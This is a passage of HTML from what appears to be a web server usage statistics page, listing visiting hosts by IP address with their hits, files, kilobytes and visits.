SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>955</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">99.117.20.8</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>949</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">166.137.156.168</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>949</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">188.31.76.152</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>949</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">71.175.1.54</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>949</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">71.80.156.183</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>814</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.95%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">74.125.17.85</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1575</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.84%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">109.175.202.134</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>948</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">67.217.35.38</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>604</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">209.2.183.102</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">157.55.36.50</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>84</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.36%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">157.55.35.85</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>661</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.77%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">95.108.158.231</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">95.108.150.235</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>43</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.63%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.54%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>82</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">38.100.21.63</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>44</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>58</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">157.56.93.193</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1171</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">193.0.129.75</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>81</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.09%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">69.58.178.59</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.52%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>70</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">157.55.33.84</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>48</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.52%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.40%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">50.28.77.173</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.46%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">184.154.48.82</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.46%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">207.46.193.50</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=10>Top 30 of 348 Total Sites By KBytes</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#0080FF" ALIGN=center COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Hostname</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>63</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.62%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4652</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">24.97.181.182</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2614</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">171.99.249.130</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2076</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">146.209.159.23</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.96%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1640</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">110.74.199.4</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1625</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">140.112.39.132</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1608</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">128.118.132.120</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1608</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">80.169.172.2</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1594</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">165.91.172.212</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">108.123.106.233</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">109.77.232.229</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">130.88.64.220</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">131.180.140.25</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">137.222.114.243</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">150.204.129.181</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">150.204.130.134</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">164.11.203.58</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">194.80.229.244</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.154.193.1</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT 